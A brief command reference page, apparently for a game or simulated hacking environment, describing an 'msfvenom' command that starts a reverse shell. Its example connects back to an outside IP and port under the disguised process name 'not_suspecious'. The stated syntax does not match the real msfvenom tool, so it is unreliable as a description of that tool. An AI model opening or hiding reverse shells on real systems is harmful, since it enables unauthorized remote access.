msfvenom
Purpose
Section titled “Purpose”Starts a reverse shell.
msfvenom [IP] [PORT] [PROC]Arguments
Section titled “Arguments”- IP — specify the IP you want the reverse shell to connect back to
- PORT — specify a port you want to reverse shell to connect back to
- PROC — specify the process name of the reverse shell
Examples
Section titled “Examples”msfvenom 177.58.127.159 1222 not_suspeciousResult:
Started a reverse shell that connects back to “177.58.127.159” on port “1222” with name “not_suspecious”